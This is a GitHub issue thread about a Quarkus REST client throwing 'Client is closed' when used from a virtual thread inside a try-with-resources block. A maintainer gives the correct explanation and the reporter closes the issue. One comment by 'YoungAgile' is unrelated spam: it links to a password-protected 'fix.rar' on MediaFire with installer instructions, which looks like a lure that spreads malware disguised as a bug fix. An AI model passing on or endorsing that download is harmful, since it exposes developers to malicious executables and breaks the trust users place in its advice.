### ISSUE TITLE
IllegalStateException: Client is closed when using quarkus-rest-client with virtual threads

### ISSUE THREAD

**Issue by nicolasduminil** [quarkusio/quarkus#42764]
### Describe the bug

In a Quarkus test I use `quarkus-rest-client` in order to invoke a REST endpoint. It works when invoked in the carrier thread but, as soon as I'm doing the same in a  virtual thread, it raises the mentioned exception.

For example:

    ...
    try (Client client = ClientBuilder.newClient())
    {
      client.target(...).request().get(...);
      ...
    }
    ...

works as expected while:

    ...
    try (Client client = ClientBuilder.newClient())
    {
     Thread.startVirtualThread(() ->
      {
        client.target(...).request().get(...);
      ...
      });
    }
    ...

raises the following stack:

    [INFO] Running fr.simplex_software.react.loom.tests.TimeZoneResourceIT
    2024-08-26 17:55:54,177 INFO  [io.quarkus] (main) simple-loom 1.0-SNAPSHOT on JVM (powered by Quarkus 3.11.0) started in 2.206s. Listening on: http://localhost:8081
    2024-08-26 17:55:54,179 INFO  [io.quarkus] (main) Profile test activated. 
    2024-08-26 17:55:54,179 INFO  [io.quarkus] (main) Installed features: [cdi, kubernetes, rest, rest-client, rest-client-jsonb, rest-jsonb, smallrye-context-propagation, vertx]
    2024-08-26 17:55:55,789 DEBUG [org.jbo.res.rea.cli.log.DefaultClientLogger] (vert.x-eventloop-thread-2) Request: GET http://localhost:8080... Headers[User-Agent=Quarkus REST Client], Empty body
    2024-08-26 17:55:56,394 DEBUG [org.jbo.res.rea.cli.log.DefaultClientLogger] (vert.x-eventloop-thread-2) Response: GET http://localhost:8080..., Status[200 OK], Headers[content-length=22 Content-Type=application/json;charset=UTF-8], Body:
    ...
    Exception in thread "" java.lang.IllegalStateException: Client is closed
        at org.jboss.resteasy.reactive.client.impl.ClientImpl.abortIfClosed(ClientImpl.java:240)
        at org.jboss.resteasy.reactive.client.impl.ClientImpl.target(ClientImpl.java:263)
        at org.jboss.resteasy.reactive.client.impl.ClientImpl.target(ClientImpl.java:251)
        at fr.simplex_software.react.loom.tests.TimeZoneResourceIT.lambda$testTimeZoneResource$0(TimeZoneResourceIT.java:31)
        at java.base/java.lang.VirtualThread.run(VirtualThread.java:309

### Expected behavior

I expect that the `jakarta.ws.rs.client.Client` instance be available in a virtual thread the same way as in a carrier thread.

### Actual behavior

Raises the following exception:

    [INFO] Running fr.simplex_software.react.loom.tests.TimeZoneResourceIT
    2024-08-26 17:55:54,177 INFO  [io.quarkus] (main) simple-loom 1.0-SNAPSHOT on JVM (powered by Quarkus 3.11.0) started in 2.206s. Listening on: http://localhost:8081
    2024-08-26 17:55:54,179 INFO  [io.quarkus] (main) Profile test activated. 
    2024-08-26 17:55:54,179 INFO  [io.quarkus] (main) Installed features: [cdi, kubernetes, rest, rest-client, rest-client-jsonb, rest-jsonb, smallrye-context-propagation, vertx]
    2024-08-26 17:55:55,789 DEBUG [org.jbo.res.rea.cli.log.DefaultClientLogger] (vert.x-eventloop-thread-2) Request: GET http://localhost:8080... Headers[User-Agent=Quarkus REST Client], Empty body
    2024-08-26 17:55:56,394 DEBUG [org.jbo.res.rea.cli.log.DefaultClientLogger] (vert.x-eventloop-thread-2) Response: GET http://localhost:8080..., Status[200 OK], Headers[content-length=22 Content-Type=application/json;charset=UTF-8], Body:
    ...
    Exception in thread "" java.lang.IllegalStateException: Client is closed
        at org.jboss.resteasy.reactive.client.impl.ClientImpl.abortIfClosed(ClientImpl.java:240)
        at org.jboss.resteasy.reactive.client.impl.ClientImpl.target(ClientImpl.java:263)
        at org.jboss.resteasy.reactive.client.impl.ClientImpl.target(ClientImpl.java:251)
        at fr.simplex_software.react.loom.tests.TimeZoneResourceIT.lambda$testTimeZoneResource$0(TimeZoneResourceIT.java:31)
        at java.base/java.lang.VirtualThread.run(VirtualThread.java:309

### How to Reproduce?

No reproducer

### Output of `uname -a` or `ver`

Linux nicolas-XPS-15-9570 5.15.0-119-generic #129-Ubuntu SMP Fri Aug 2 19:25:20 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux

### Output of `java -version`

java version "21.0.3" 2024-04-16 LTS Java(TM) SE Runtime Environment (build 21.0.3+7-LTS-152) Java HotSpot(TM) 64-Bit Server VM (build 21.0.3+7-LTS-152, mixed mode, sharing)

### Quarkus version or git rev

3.11.0

### Build tool (ie. output of `mvnw --version` or `gradlew --version`)

Apache Maven 3.9.5 (57804ffe001d7215b5e7bcb531cf83df38f93546) Maven home: /opt/apache-maven-3.9.5 Java version: 21.0.3, vendor: Oracle Corporation, runtime: /usr/lib/jvm/jdk-21-oracle-x64 Default locale: en_US, platform encoding: UTF-8 OS name: "linux", version: "5.15.0-119-generic", arch: "amd64", family: "unix"

### Additional information

N/A

**Comment by YoungAgile** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by nicolasduminil** [comment]
However, using RESTassured works as expected, for example:

          Thread.startVirtualThread(() ->given() .when().get("...") .then().statusCode(HttpStatus.SC_OK);

**Comment by cescoffier** [comment]
That's expected. The resources (the client) is closed as soon as the try-with-resource block completes. However, you create a virtual thread, which is executed "later" (when depends on the scheduling). The client is likely going to be closed when this happens. 

The second example with rest assured client is not closed, so the call is successful.

**Comment by nicolasduminil** [comment]
I see ... As a matter of fact, replacing the try-with-resource with a simple try works as expected. Good to know. Many thanks. 
Closing.

**Comment by nicolasduminil** [comment]
Okay, I'll take care, thanks.
